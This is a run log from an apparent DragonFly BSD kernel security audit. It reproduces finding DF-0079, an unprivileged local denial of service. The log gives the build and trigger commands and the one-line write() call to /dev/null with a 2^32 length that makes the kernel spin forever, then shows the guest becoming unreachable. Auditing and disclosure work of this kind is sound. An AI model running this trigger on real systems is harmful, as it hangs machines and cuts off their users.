DragonFlyBSD Kernel Audit
DF-0079 / run.log
================================================================================
DF-0079 — decisive runtime demonstration (host-side timeline + serial proof)
Guest: DragonFly 6.5-DEVELOPMENT x86_64, 2 CPUs, maxx uid 1001 (not in wheel)
================================================================================

[1] Build (as maxx):
    $ cd poc/DF-0079 && cc -o df0079 df0079.c
    BUILD_EXIT=0
    -rwxr-xr-x 1 maxx maxx 9104 ... df0079

[2] Trigger (as UNPRIVILEGED maxx; /dev/null is mode 0666):
    maxx$ cd poc/DF-0079 && nohup ./df0079 > w.out 2>&1 < /dev/null &
    WEDGE_PID=889
    # ./df0079 does: fd=open("/dev/null",O_WRONLY); write(fd,(void*)0x1,0x100000000ULL);
    #                ^^^ iov_len = 2^32, low 32 bits == 0 -> u_int c truncates to 0
    #                    -> mmrw bookkeeping subtracts 0 -> while(uio_resid>0) spins forever

[3] Host-side ssh reachability timeline after trigger (probes every 1s):
    t= 1s  ssh=UNREACHABLE
    t= 2s  ssh=UNREACHABLE
    t= 3s  ssh=UNREACHABLE
    t= 4s  ssh=UNREACHABLE
    t= 6s  ssh=UNREACHABLE
    t= 8s  ssh=UNREACHABLE
    t=10s  ssh=UNREACHABLE
    => A SINGLE unprivileged write() rendered the guest unresponsive to ssh
       within 1 second. No panic (clean starvation). Only `vm.sh reset` recovers.

================================================================================
EARLIER DECISIVE RUN (richer capture; wedge landed on the non-network CPU so a
serial-console watcher survived long enough to snapshot the wedged thread).
Full per-iteration ps/top in serial_wedge_capture.txt. Key excerpt:
================================================================================
   PID   PPID STAT     UID %CPU      TIME UCOMM            COMMAND
   852      1 R0      1001  0.0   0:00.50 df0079           ./df0079     (t+0.0s)
   852      1 R0      1001  0.0   0:01.68 df0079           ./df0079     (t+0.7s)
   852      1 R0      1001  0.0   0:02.86 df0079           ./df0079     (t+1.4s)
   ...
   852      1 R0      1001  0.0   0:20.56 df0079           ./df0079     (t+19.5s)

  CPU states: 0.0% user, 0.0% nice, 50.0% system, 0.0% interrupt, 50.0% idle
  (2-CPU guest: one core fully in kernel `sys` = the wedged mmrw loop.)

INTERPRETATION:
  - STAT R0          : thread Running on CPU (not blocked/sleeping) -> spinning.
  - UID 1001         : triggered by UNPRIVILEGED user maxx.
  - TIME grows ~1.18s per ~1.0s wall  -> 100% of one CPU, indefinitely.
  - residual never drains (c=0 truncation) -> the write() NEVER returns.
  - process is unkillable (no signal-check point in the tight kernel loop);
    only a hard reset recovers the guest.

VERDICT: REPRODUCED. Trivial unprivileged full-system/local DoS.